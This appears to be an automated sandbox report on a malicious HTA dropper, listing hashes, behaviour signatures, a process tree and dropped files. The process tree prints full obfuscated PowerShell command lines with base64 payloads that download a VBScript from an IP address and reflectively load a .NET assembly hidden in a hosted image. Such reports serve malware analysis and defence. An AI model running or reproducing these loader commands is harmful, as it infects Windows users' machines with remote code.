Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
16-12-2024 06:14
Behavioral task
behavioral1
Sample
givenbestupdatedoingformebestthingswithgreatnewsformegive.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
givenbestupdatedoingformebestthingswithgreatnewsformegive.hta
Resource
win10v2004-20241007-en
General
-
Target
givenbestupdatedoingformebestthingswithgreatnewsformegive.hta
-
Size
144KB
-
MD5
f1c8937918d65456c0565dc023e48210
-
SHA1
487a5ff34609e3aaa41a1d7a92f3705f377ab31b
-
SHA256
32f32787e8bbc5276d6f9d1d1d8b0f5f762b33df9abf8a820f34d6e702603b99
-
SHA512
6f4e87018f6e4009f462691c57ab9f08e6b84b1b0d4cab58ffc2e8472bf78a01e4e0374c29d5c1745a6d4b6123022fe5c46dd4a4872204fb4e54867f4ace963f
-
SSDEEP
768:t1E5YUGhum2oum2mS5KUJDVUKhCAGVf/AqYhASOA/lbkaRqqwS5z6Yr7CAtu48Zj:tf
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 3060 powershell.exe 6 3012 powershell.exe 8 3012 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 3060 powershell.exe -
pid Process 3012 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3060 powershell.exe 3012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2492 wrote to memory of 2088 2492 mshta.exe 31 PID 2492 wrote to memory of 2088 2492 mshta.exe 31 PID 2492 wrote to memory of 2088 2492 mshta.exe 31 PID 2492 wrote to memory of 2088 2492 mshta.exe 31 PID 2088 wrote to memory of 3060 2088 cmd.exe 33 PID 2088 wrote to memory of 3060 2088 cmd.exe 33 PID 2088 wrote to memory of 3060 2088 cmd.exe 33 PID 2088 wrote to memory of 3060 2088 cmd.exe 33 PID 3060 wrote to memory of 3068 3060 powershell.exe 34 PID 3060 wrote to memory of 3068 3060 powershell.exe 34 PID 3060 wrote to memory of 3068 3060 powershell.exe 34 PID 3060 wrote to memory of 3068 3060 powershell.exe 34 PID 3068 wrote to memory of 2796 3068 csc.exe 35 PID 3068 wrote to memory of 2796 3068 csc.exe 35 PID 3068 wrote to memory of 2796 3068 csc.exe 35 PID 3068 wrote to memory of 2796 3068 csc.exe 35 PID 3060 wrote to memory of 2556 3060 powershell.exe 37 PID 3060 wrote to memory of 2556 3060 powershell.exe 37 PID 3060 wrote to memory of 2556 3060 powershell.exe 37 PID 3060 wrote to memory of 2556 3060 powershell.exe 37 PID 2556 wrote to memory of 3012 2556 WScript.exe 38 PID 2556 wrote to memory of 3012 2556 WScript.exe 38 PID 2556 wrote to memory of 3012 2556 WScript.exe 38 PID 2556 wrote to memory of 3012 2556 WScript.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givenbestupdatedoingformebestthingswithgreatnewsformegive.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tctb7ttv.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE207.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE206.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2796
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnaster5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5c84778a47e1a8996ca16669e166841c8
SHA138ba2cc6c37f54468f4e320bcf9441230e5ad16f
SHA256bcf25f051bc25b83d06cfab8914abeb92113691120ddae6edfbd703c46a8171a
SHA512c5cbe571903e1474d668d2eece6de34bc7b5e3dc0793ceb3a1b1e3cbf66b67a8a56b7712d5c0fdf6eab53b10a6159d2932c4b224d49a4426dfaf476370a1a856
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD53a04fd9632a2dd872bdc75aeb2095553
SHA1bd8b62939e08bb5234334f18255435dd85d02589
SHA256d560ed1f47486eff142134183b44f4c0857b2550cd3766d13f6eb1a062055eb9
SHA51272fc8fc07a182f3c34d3e7182a8d98c067e07abfc020f0f7f044ee4aea1b1294a49ee3d8750f4c488daca8b52a3d26f91f775bc6b674649d38d8bfbb695ee0a1
-
Filesize
7KB
MD5a7676a5b445f9cbc3a3ca2e876b52b7f
SHA19c92d0b1261417f371217577cb493977e8adfa3a
SHA2568ae13d6fb5d5d7121fb59c6b178419e592dee21847196da68a47d1f5c759cfc6
SHA51274489b1af8cd4f83bb86b295e26c5a89d4dc099c9a018ba156d1c80cf14d0186e4d16bc834671d212ec73f58b9ac8faff5b0993a13ca354cde2176d317fba33e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E69WHBZNWLVEWZQDDXQU.temp
Filesize7KB
MD5c34746dc7563201569a7ec85942e19ef
SHA1d4819eb574f83fed9192ebd859fcb9d7697bceb4
SHA2568cdf803d65ef43359daafefdbac4874980a54c2e667726784d1e3547eba57c1c
SHA512402c2548110b251d469b14e7cbe5359ad4c423baf908cb9e3c09e3c0a3173484ac6242904b47de02b1e3ff890fbc7c5d6be1c7264cfc5323b9b0c5cfc43e4b30
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d8229020c360d0256248cb16adfa1efe
SHA1fdc7f1de38666e43da0898825ba64e82f055e36f
SHA25630fb1c6d432aa31b809cb8fdcb191e208912497acd6264d2b8fe3f37c568520c
SHA512c96c7948db07def050c5f813bb2006f85d6a160d21450aec8fe7c9c314cfb0efb7b2ae1165658cdeb151b7ef5921bc3f935377205b3d10cfeddb283b2afcb27c
-
Filesize
150KB
MD586db247a20761fd6b7ef9ef0b3151dd1
SHA1fbd741b0283bab0ddd1ae638ffa4db3732e18211
SHA256d1932467c3580ff9a99f7a9a6408d2c050a4ddde46cce7105e557a230080117c
SHA512ee894328d447c348c7f8288b07ee9c668fd3ad4951f0b64443c7b5d62b41e6da24389d8df9799bdba30620279c11ca55c0658722f97240480c540b3fcf2ed866
-
Filesize
652B
MD50af0a8ae02d7386f682986f8ddbcd518
SHA107f0365f46e31034f405dda06e44876cbdd33ce3
SHA256804a10d014a0c3de5fd8d4d810d9310eb76692297a6ceada8caa479631fd5464
SHA5126c491ab25258f38ca31e87afb728dcdf83ca4f1b9c5582da4285536997d39f01bc86cc0a1bf8b4231ceccb603d24c9c63b61ee6dcc0c1dd0e62343cf90a0dd4f
-
Filesize
466B
MD5b7c397e8a98f83c3423f6574d154672f
SHA1c9031b00456ef3a66ba70c72b3425575e27ceb28
SHA256fdf1bd81cce7d5ceba2d12973bff373ca0d6c55687da2c56b1d589caad8b8248
SHA512c88ee138a371c5e00c2795b73bb1ed5053155181f77830bdf597aa68b065859d0e9ba64819e40601f7271f022b2d05daa0acba552bd3f5040ae715a5606dd7c0
-
Filesize
309B
MD5f49ee8d2c138befc343dbad0af4c6182
SHA16faad3978c3c6a727ac6b04689e9578fded68f2c
SHA2566b99a5b004b930d1cc01a2c41011979526d77f137fdc4d2d4962b56661bcce01
SHA512556f92504455e62b188edf211caf68a43a7aaac1f091b7807d7fc735f015718f1153f2febc1dda585de07333a8c5c691273fd1dee92350bcfe1da22557107c57